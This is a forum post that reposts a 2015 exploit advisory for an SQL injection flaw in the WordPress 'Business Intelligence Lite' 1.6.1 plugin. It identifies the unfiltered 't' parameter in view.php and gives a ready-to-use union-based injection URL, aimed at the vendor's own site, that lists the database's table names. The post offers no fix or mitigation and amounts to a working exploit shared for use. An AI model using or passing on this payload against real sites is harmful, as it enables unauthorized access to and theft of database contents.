Jump to content
Sign in to follow this  
KhiZaRix

WordPress Business Intelligence Lite 1.6.1 SQL Injection

Recommended Posts

##################################################################################################

#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability

#Author : Jagriti Sahu AKA Incredible

#Vendor Link : https://www.wpbusinessintelligence.com

#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip

#Date : 1/04/2015

#Discovered at : IndiShell Lab

#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^

##################################################################################################

////////////////////////

/// Overview:

////////////////////////

Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php'

and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.

///////////////////////////////

// Vulnerability Description: /

///////////////////////////////

vulnerability is due to parameter " t " in file 'view.php'.

user can inject sql query uning GET parameter 't'

////////////////

/// POC ////

///////////////

POC Image URL--->

=================

Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting

SQL Injection in parameter 't' (file 'view.php'):

=================================================

Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1

Union based SQL injection exist in the parameter which can be exploited as follows:

Payload used in Exploitation for Database name --->

http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php

?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+

###################################################################################################

--==[[special Thanks to]]==--

# Manish Kishan Tanwar ^_^ #

Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...